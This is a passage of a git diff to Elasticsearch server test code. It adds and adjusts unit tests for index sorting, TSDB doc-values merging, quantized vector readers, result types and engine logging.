import org.mockito.Mockito; @@ -48,6 +49,7 @@ import static org.mockito.Mockito.verify; import static org.mockito.Mockito.verifyNoMoreInteractions; +@WithoutEntitlements // Entitlement logging interferes public class ScopedSettingsTests extends ESTestCase { public void testResetSetting() { diff --git a/server/src/test/java/org/elasticsearch/common/util/ResultTests.java b/server/src/test/java/org/elasticsearch/common/util/ResultTests.java new file mode 100644 index 0000000000000..cfb489b6224c6 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/common/util/ResultTests.java @@ -0,0 +1,47 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.common.util; + +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ElasticsearchStatusException; +import org.elasticsearch.rest.RestStatus; +import org.elasticsearch.test.ESTestCase; + +import static org.elasticsearch.test.hamcrest.OptionalMatchers.isEmpty; +import static org.elasticsearch.test.hamcrest.OptionalMatchers.isPresentWith; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.sameInstance; + +public class ResultTests extends ESTestCase { + + public void testSuccess() { + final String str = randomAlphaOfLengthBetween(3, 8); + final Result result = Result.of(str); + assertThat(result.isSuccessful(), is(true)); + assertThat(result.isFailure(), is(false)); + assertThat(result.get(), sameInstance(str)); + assertThat(result.failure(), isEmpty()); + assertThat(result.asOptional(), isPresentWith(str)); + } + + public void testFailure() { + final ElasticsearchException exception = new ElasticsearchStatusException( + randomAlphaOfLengthBetween(10, 30), + RestStatus.INTERNAL_SERVER_ERROR + ); + final Result result = Result.failure(exception); + assertThat(result.isSuccessful(), is(false)); + assertThat(result.isFailure(), is(true)); + assertThat(expectThrows(Exception.class, result::get), sameInstance(exception)); + assertThat(result.failure(), isPresentWith(sameInstance(exception))); + assertThat(result.asOptional(), isEmpty()); + } + +} diff --git a/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java b/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java index ec8e0f69d89d8..a193bcd8a89ed 100644 --- a/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java +++ b/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java @@ -59,12 +59,14 @@ protected void runInternal() { try { barrier1.await(); } catch (Exception e) { + logger.error("barrier1 interrupted", e); fail("interrupted"); } count.incrementAndGet(); try { barrier2.await(); } catch (Exception e) { + logger.error("barrier2 interrupted", e); fail("interrupted"); } if (shouldRunThrowException) { @@ -112,6 +114,7 @@ protected void runInternal() { try { barrier.await(); } catch (Exception e) { + logger.error("barrier interrupted", e); fail("interrupted"); } if (shouldRunThrowException) { diff --git 
a/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java b/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java index be6af02dbb940..468951b5ae945 100644 --- a/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java +++ b/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java @@ -23,7 +23,6 @@ import org.elasticsearch.common.transport.TransportAddress; import org.elasticsearch.common.util.concurrent.DeterministicTaskQueue; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -235,8 +234,7 @@ public void setup() { boundTransportAddress -> localNode, null, connectionManager, - new TaskManager(settings, threadPool, emptySet()), - Tracer.NOOP + new TaskManager(settings, threadPool, emptySet()) ); transportService.start(); diff --git a/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java b/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java index 276c01d041bf8..f5bdf66a96ab7 100644 --- a/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java +++ b/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java @@ -27,6 +27,7 @@ import org.elasticsearch.index.Index; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.hamcrest.Matcher; import org.junit.Before; @@ -48,6 +49,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.not; +@WithoutEntitlements // commands don't run with entitlements enforced public class NodeRepurposeCommandTests extends ESTestCase { private static final Index INDEX = new Index("testIndex", "testUUID"); diff --git a/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java b/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java index 515561db28232..0308f082e8359 100644 --- a/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java +++ b/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.gateway.PersistedClusterStateService; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.junit.After; import org.junit.Before; @@ -31,6 +32,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +@WithoutEntitlements // commands don't run with entitlements enforced public class OverrideNodeVersionCommandTests extends ESTestCase { private Environment environment; diff --git a/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java b/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java index 7221d69b74d46..52cc1348fd48a 100644 --- a/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java +++ b/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.search.Sort; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.time.DateUtils; import org.elasticsearch.common.util.Maps; import org.elasticsearch.index.fielddata.FieldDataContext; 
import org.elasticsearch.index.fielddata.IndexFieldData; @@ -30,9 +31,12 @@ import org.elasticsearch.search.sort.SortOrder; import org.elasticsearch.test.ESTestCase; +import java.util.ArrayList; import java.util.Collections; +import java.util.List; import java.util.Map; import java.util.Set; +import java.util.stream.Stream; import static org.elasticsearch.index.IndexSettingsTests.newIndexMeta; import static org.hamcrest.Matchers.arrayWithSize; @@ -174,6 +178,58 @@ public void testSortingAgainstAliasesPre713() { ); } + public void testSortMissingValueDateNanoFieldPre714() { + MappedFieldType tsField = new DateFieldMapper.DateFieldType("@timestamp", true, DateFieldMapper.Resolution.NANOSECONDS); + var indexSettingsBuilder = Settings.builder(); + indexSettingsBuilder.put("index.sort.field", "@timestamp"); + indexSettingsBuilder.put("index.sort.order", "desc"); + + // test with index version 7.13 and before + var pre714Versions = Stream.concat(Stream.of(IndexVersions.V_7_13_0), randomVersionsBefore(IndexVersions.V_7_13_0)).toList(); + for (var version : pre714Versions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(Long.MIN_VALUE)); + } + + // now test with index version 7.14 and after + var post713Versions = Stream.concat(Stream.of(IndexVersions.V_7_14_0), randomVersionsAfter(IndexVersions.V_7_14_0)).toList(); + for (var version : post713Versions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(0L)); + } + + // asc order has not changed behaviour in any version + indexSettingsBuilder.put("index.sort.order", "asc"); + var allVersions = Stream.concat(post713Versions.stream(), pre714Versions.stream()).toList(); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(DateUtils.MAX_NANOSECOND)); + } + + // ensure no change in behaviour when a missing value is set + indexSettingsBuilder.put("index.sort.missing", "_first"); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(0L)); + } + indexSettingsBuilder.put("index.sort.missing", "_last"); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(Long.MAX_VALUE)); + } + } + public void testTimeSeriesMode() { IndexSettings indexSettings = indexSettings( Settings.builder() @@ 
-224,4 +280,24 @@ private Sort buildIndexSort(IndexSettings indexSettings, Map<String, MappedFieldType> fieldTypes) { + + /* Returns a stream of versions before the given version */ + Stream<IndexVersion> randomVersionsBefore(IndexVersion indexVersion) { + var versions = IndexVersions.getAllVersions().stream().filter(v -> v.before(indexVersion)).toList(); + List<IndexVersion> ret = new ArrayList<>(); + for (int i = 0; i < 10; i++) { + ret.add(randomValueOtherThanMany(ret::contains, () -> randomFrom(versions))); + } + return ret.stream(); + } + + /* Returns a stream of versions after the given version */ + Stream<IndexVersion> randomVersionsAfter(IndexVersion indexVersion) { + var versions = IndexVersions.getAllVersions().stream().filter(v -> v.after(indexVersion)).toList(); + List<IndexVersion> ret = new ArrayList<>(); + for (int i = 0; i < 10; i++) { + ret.add(randomValueOtherThanMany(ret::contains, () -> randomFrom(versions))); + } + return ret.stream(); + } } diff --git a/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java index a219ebb3740cc..daedfce7b71e1 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java @@ -58,13 +58,13 @@ public class ES87TSDBDocValuesFormatTests extends BaseDocValuesFormatTestCase { LogConfigurator.configureESLogging(); } - static class TestES87TSDBDocValuesFormat extends ES87TSDBDocValuesFormat { + public static class TestES87TSDBDocValuesFormat extends ES87TSDBDocValuesFormat { TestES87TSDBDocValuesFormat() { super(); } - TestES87TSDBDocValuesFormat(int skipIndexIntervalSize) { + public TestES87TSDBDocValuesFormat(int skipIndexIntervalSize) { super(skipIndexIntervalSize); } diff --git a/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java index 368d6f23d0fa1..46b46fda11d56 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java @@ -11,6 +11,7 @@ import org.apache.lucene.codecs.Codec; import org.apache.lucene.codecs.DocValuesFormat; +import org.apache.lucene.codecs.lucene90.Lucene90DocValuesFormat; import org.apache.lucene.document.BinaryDocValuesField; import org.apache.lucene.document.Document; import org.apache.lucene.document.NumericDocValuesField; @@ -21,17 +22,29 @@ import org.apache.lucene.index.DocValues; import org.apache.lucene.index.IndexWriter; import org.apache.lucene.index.IndexWriterConfig; +import org.apache.lucene.index.IndexableField; +import org.apache.lucene.index.LeafReader; import org.apache.lucene.index.LogByteSizeMergePolicy; +import org.apache.lucene.index.NumericDocValues; +import org.apache.lucene.index.SortedDocValues; import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; import org.apache.lucene.search.SortedNumericSortField; import org.apache.lucene.util.BytesRef; import org.elasticsearch.cluster.metadata.DataStream; +import org.elasticsearch.common.Randomness; +import org.elasticsearch.common.util.CollectionUtils; import org.elasticsearch.index.codec.Elasticsearch900Lucene101Codec; import org.elasticsearch.index.codec.tsdb.ES87TSDBDocValuesFormatTests; +import org.elasticsearch.test.ESTestCase; + +import java.io.IOException; +import java.util.ArrayList; import java.util.Arrays; +import java.util.List;
import java.util.Locale; +import java.util.function.Supplier; +import java.util.stream.IntStream; public class ES819TSDBDocValuesFormatTests extends ES87TSDBDocValuesFormatTests { @@ -514,6 +527,184 @@ public void testWithNoValueMultiValue() throws Exception { } } + public void testAddIndices() throws IOException { + String timestampField = "@timestamp"; + String hostnameField = "host.name"; + Supplier<IndexWriterConfig> indexConfigWithRandomDVFormat = () -> { + IndexWriterConfig config = getTimeSeriesIndexWriterConfig(hostnameField, timestampField); + DocValuesFormat dvFormat = switch (random().nextInt(3)) { + case 0 -> new ES87TSDBDocValuesFormatTests.TestES87TSDBDocValuesFormat(random().nextInt(4, 16)); + case 1 -> new ES819TSDBDocValuesFormat(); + case 2 -> new Lucene90DocValuesFormat(); + default -> throw new AssertionError("unknown option"); + }; + config.setCodec(new Elasticsearch900Lucene101Codec() { + @Override + public DocValuesFormat getDocValuesFormatForField(String field) { + return dvFormat; + } + }); + return config; + }; + var allNumericFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "numeric_" + n).toList(); + var allSortedNumericFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_numeric_" + n).toList(); + var allSortedFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_" + n).toList(); + var allSortedSetFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_set" + n).toList(); + var allBinaryFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "binary_" + n).toList(); + try (var source1 = newDirectory(); var source2 = newDirectory(); var singleDir = newDirectory(); var mergeDir = newDirectory()) { + try ( + var writer1 = new IndexWriter(source1, indexConfigWithRandomDVFormat.get()); + var writer2 = new IndexWriter(source2, indexConfigWithRandomDVFormat.get()); + var singleWriter = new IndexWriter(singleDir, indexConfigWithRandomDVFormat.get()) + ) { + int numDocs = 1 + random().nextInt(1_000); + long timestamp = random().nextLong(1000_000L); + for (int i = 0; i < numDocs; i++) { + List<IndexableField> fields = new ArrayList<>(); + String hostName = String.format(Locale.ROOT, "host-%d", random().nextInt(5)); + timestamp += 1 + random().nextInt(1_000); + fields.add(new SortedDocValuesField(hostnameField, new BytesRef(hostName))); + fields.add(new SortedNumericDocValuesField(timestampField, timestamp)); + var numericFields = ESTestCase.randomSubsetOf(allNumericFields); + for (String f : numericFields) { + fields.add(new NumericDocValuesField(f, random().nextLong(1000L))); + } + var sortedNumericFields = ESTestCase.randomSubsetOf(allSortedNumericFields); + for (String field : sortedNumericFields) { + int valueCount = 1 + random().nextInt(3); + for (int v = 0; v < valueCount; v++) { + fields.add(new SortedNumericDocValuesField(field, random().nextLong(1000L))); + } + } + var sortedFields = ESTestCase.randomSubsetOf(allSortedFields); + for (String field : sortedFields) { + fields.add(new SortedDocValuesField(field, new BytesRef("s" + random().nextInt(100)))); + } + var sortedSetFields = ESTestCase.randomSubsetOf(allSortedSetFields); + for (String field : sortedSetFields) { + int valueCount = 1 + random().nextInt(3); + for (int v = 0; v < valueCount; v++) { + fields.add(new SortedSetDocValuesField(field, new BytesRef("ss" + random().nextInt(100)))); + } + } + List<String> binaryFields = ESTestCase.randomSubsetOf(allBinaryFields); + for (String field : binaryFields) { + fields.add(new BinaryDocValuesField(field,
new BytesRef("b" + random().nextInt(100)))); + } + for (IndexWriter writer : List.of(ESTestCase.randomFrom(writer1, writer2), singleWriter)) { + Randomness.shuffle(fields); + writer.addDocument(fields); + if (random().nextInt(100) <= 5) { + writer.commit(); + } + } + } + if (random().nextBoolean()) { + writer1.forceMerge(1); + } + if (random().nextBoolean()) { + writer2.forceMerge(1); + } + singleWriter.commit(); + singleWriter.forceMerge(1); + } + try (var mergeWriter = new IndexWriter(mergeDir, getTimeSeriesIndexWriterConfig(hostnameField, timestampField))) { + mergeWriter.addIndexes(source1, source2); + mergeWriter.forceMerge(1); + } + try (var reader1 = DirectoryReader.open(singleDir); var reader2 = DirectoryReader.open(mergeDir)) { + assertEquals(reader1.maxDoc(), reader2.maxDoc()); + assertEquals(1, reader1.leaves().size()); + assertEquals(1, reader2.leaves().size()); + for (int i = 0; i < reader1.leaves().size(); i++) { + LeafReader leaf1 = reader1.leaves().get(i).reader(); + LeafReader leaf2 = reader2.leaves().get(i).reader(); + for (String f : CollectionUtils.appendToCopy(allSortedNumericFields, timestampField)) { + var dv1 = leaf1.getNumericDocValues(f); + var dv2 = leaf2.getNumericDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != NumericDocValues.NO_MORE_DOCS) { + assertNotEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.longValue(), dv2.longValue()); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : CollectionUtils.appendToCopy(allSortedNumericFields, timestampField)) { + var dv1 = leaf1.getSortedNumericDocValues(f); + var dv2 = leaf2.getSortedNumericDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != NumericDocValues.NO_MORE_DOCS) { + assertNotEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.docValueCount(), dv2.docValueCount()); + for (int v = 0; v < dv1.docValueCount(); v++) { + assertEquals(dv1.nextValue(), dv2.nextValue()); + } + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : CollectionUtils.appendToCopy(allSortedFields, hostnameField)) { + var dv1 = leaf1.getSortedDocValues(f); + var dv2 = leaf2.getSortedDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.lookupOrd(dv1.ordValue()), dv2.lookupOrd(dv2.ordValue())); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : allSortedSetFields) { + var dv1 = leaf1.getSortedSetDocValues(f); + var dv2 = leaf2.getSortedSetDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.docValueCount(), dv2.docValueCount()); + for (int v = 0; v < dv1.docValueCount(); v++) { + assertEquals(dv1.lookupOrd(dv1.nextOrd()), dv2.lookupOrd(dv2.nextOrd())); + } + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : allBinaryFields) { + var dv1 = leaf1.getBinaryDocValues(f); + var dv2 = leaf2.getBinaryDocValues(f); + 
if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.binaryValue(), dv2.binaryValue()); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + } + } + } + } + private IndexWriterConfig getTimeSeriesIndexWriterConfig(String hostnameField, String timestampField) { var config = new IndexWriterConfig(); config.setIndexSort( diff --git a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java index 9a20b56d80ba4..ca4721c354ef9 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java @@ -23,6 +23,7 @@ import org.apache.lucene.codecs.FilterCodec; import org.apache.lucene.codecs.KnnVectorsFormat; import org.apache.lucene.codecs.KnnVectorsReader; +import org.apache.lucene.codecs.lucene99.Lucene99FlatVectorsReader; import org.apache.lucene.codecs.perfield.PerFieldKnnVectorsFormat; import org.apache.lucene.document.Document; import org.apache.lucene.document.Field; @@ -35,6 +36,7 @@ import org.apache.lucene.index.IndexWriterConfig; import org.apache.lucene.index.KnnVectorValues; import org.apache.lucene.index.LeafReader; +import org.apache.lucene.index.SegmentReader; import org.apache.lucene.index.SoftDeletesRetentionMergePolicy; import org.apache.lucene.index.Term; import org.apache.lucene.index.VectorSimilarityFunction; @@ -83,6 +85,7 @@ import static java.lang.String.format; import static org.apache.lucene.index.VectorSimilarityFunction.DOT_PRODUCT; import static org.apache.lucene.search.DocIdSetIterator.NO_MORE_DOCS; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.oneOf; @@ -309,6 +312,43 @@ public void testSimpleOffHeapSizeImpl(Directory dir, IndexWriterConfig config, b } } + public void testMergeInstance() throws IOException { + checkDirectIOSupported(); + float[] vector = randomVector(10); + VectorSimilarityFunction similarityFunction = randomSimilarity(); + KnnFloatVectorField knnField = new KnnFloatVectorField("field", vector, similarityFunction); + try (Directory dir = newFSDirectory()) { + try (IndexWriter w = new IndexWriter(dir, newIndexWriterConfig().setUseCompoundFile(false))) { + Document doc = new Document(); + knnField.setVectorValue(randomVector(10)); + doc.add(knnField); + w.addDocument(doc); + w.commit(); + + try (IndexReader reader = DirectoryReader.open(w)) { + SegmentReader r = (SegmentReader) getOnlyLeafReader(reader); + assertThat(unwrapRawVectorReader("field", r.getVectorReader()), instanceOf(DirectIOLucene99FlatVectorsReader.class)); + assertThat( + unwrapRawVectorReader("field", r.getVectorReader().getMergeInstance()), + instanceOf(Lucene99FlatVectorsReader.class) + ); + } + } + } + } + + private static KnnVectorsReader unwrapRawVectorReader(String fieldName, KnnVectorsReader knnReader) { + if (knnReader instanceof PerFieldKnnVectorsFormat.FieldsReader perField) { + return unwrapRawVectorReader(fieldName, perField.getFieldReader(fieldName)); + } else if (knnReader instanceof ES818BinaryQuantizedVectorsReader bbqReader) { + return 
unwrapRawVectorReader(fieldName, bbqReader.getRawVectorsReader()); + } else if (knnReader instanceof MergeReaderWrapper mergeReaderWrapper) { + return unwrapRawVectorReader(fieldName, mergeReaderWrapper.getMainReader()); + } else { + return knnReader; + } + } + static Directory newMMapDirectory() throws IOException { Directory dir = new MMapDirectory(createTempDir("ES818BinaryQuantizedVectorsFormatTests")); if (random().nextBoolean()) { @@ -333,6 +373,7 @@ private Directory newFSDirectory() throws IOException { } static void checkDirectIOSupported() { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java index 3a4a0d097ea1b..98aed559d9768 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java @@ -221,6 +221,7 @@ private Directory newFSDirectory() throws IOException { } static void checkDirectIOSupported() { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java b/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java index 680f6fca9652e..a41a5dd9394b4 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java @@ -2534,11 +2534,11 @@ public void testIndexWriterInfoStream() throws IllegalAccessException, IOExcepti MockAppender mockAppender = new MockAppender("testIndexWriterInfoStream"); mockAppender.start(); - Logger rootLogger = LogManager.getRootLogger(); - Level savedLevel = rootLogger.getLevel(); - Loggers.addAppender(rootLogger, mockAppender); - Loggers.setLevel(rootLogger, Level.DEBUG); - rootLogger = LogManager.getRootLogger(); + Logger theLogger = LogManager.getLogger("org.elasticsearch.index"); + Level savedLevel = theLogger.getLevel(); + Loggers.addAppender(theLogger, mockAppender); + Loggers.setLevel(theLogger, Level.DEBUG); + theLogger = LogManager.getLogger("org.elasticsearch.index"); try { // First, with DEBUG, which should NOT log IndexWriter output: @@ -2548,15 +2548,15 @@ public void testIndexWriterInfoStream() throws IllegalAccessException, IOExcepti assertFalse(mockAppender.sawIndexWriterMessage); // Again, with TRACE, which should log IndexWriter output: - Loggers.setLevel(rootLogger, Level.TRACE); + Loggers.setLevel(theLogger, Level.TRACE); engine.index(indexForDoc(doc)); engine.flush(); assertTrue(mockAppender.sawIndexWriterMessage); engine.close(); } finally { - Loggers.removeAppender(rootLogger, mockAppender); + Loggers.removeAppender(theLogger, mockAppender); mockAppender.stop(); - Loggers.setLevel(rootLogger, savedLevel); + Loggers.setLevel(theLogger, savedLevel); } } @@ -2596,10 +2596,10 @@ public void 
testMergeThreadLogging() throws Exception { final MockMergeThreadAppender mockAppender = new MockMergeThreadAppender("testMergeThreadLogging"); mockAppender.start(); - Logger rootLogger = LogManager.getRootLogger(); - Level savedLevel = rootLogger.getLevel(); - Loggers.addAppender(rootLogger, mockAppender); - Loggers.setLevel(rootLogger, Level.TRACE); + Logger theLogger = LogManager.getLogger("org.elasticsearch.index"); + Level savedLevel = theLogger.getLevel(); + Loggers.addAppender(theLogger, mockAppender); + Loggers.setLevel(theLogger, Level.TRACE); try { LogMergePolicy lmp = newLogMergePolicy(); lmp.setMergeFactor(2); @@ -2632,12 +2632,12 @@ public void testMergeThreadLogging() throws Exception { assertThat(mockAppender.mergeCompleted(), is(true)); }); - Loggers.setLevel(rootLogger, savedLevel); + Loggers.setLevel(theLogger, savedLevel); engine.close(); } } finally { - Loggers.setLevel(rootLogger, savedLevel); - Loggers.removeAppender(rootLogger, mockAppender); + Loggers.setLevel(theLogger, savedLevel); + Loggers.removeAppender(theLogger, mockAppender); mockAppender.stop(); } } diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java index 8a497d09320ff..cc8d56c2fb37b 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java @@ -14,6 +14,7 @@ import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.PathUtilsForTesting; @@ -27,8 +28,7 @@ import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.junit.After; -import org.junit.AfterClass; -import org.junit.BeforeClass; +import org.junit.Before; import java.io.IOException; import java.nio.file.FileStore; @@ -41,6 +41,7 @@ import java.util.IdentityHashMap; import java.util.LinkedHashSet; import java.util.List; +import java.util.Set; import java.util.concurrent.CountDownLatch; import java.util.concurrent.Executor; import java.util.concurrent.TimeUnit; @@ -59,8 +60,8 @@ public class ThreadPoolMergeExecutorServiceDiskSpaceTests extends ESTestCase { - private static TestMockFileStore aFileStore = new TestMockFileStore("mocka"); - private static TestMockFileStore bFileStore = new TestMockFileStore("mockb"); + private static TestMockFileStore aFileStore; + private static TestMockFileStore bFileStore; private static String aPathPart; private static String bPathPart; private static int mergeExecutorThreadCount; @@ -69,8 +70,10 @@ public class ThreadPoolMergeExecutorServiceDiskSpaceTests extends ESTestCase { private static NodeEnvironment nodeEnvironment; private static boolean setThreadPoolMergeSchedulerSetting; - @BeforeClass - public static void installMockUsableSpaceFS() throws Exception { + @Before + public void setupTestEnv() throws Exception { + aFileStore = new TestMockFileStore("mocka"); + bFileStore = new TestMockFileStore("mockb"); FileSystem current = PathUtils.getDefaultFileSystem(); aPathPart = "a-" + randomUUID(); bPathPart = "b-" + randomUUID(); @@ -96,8 
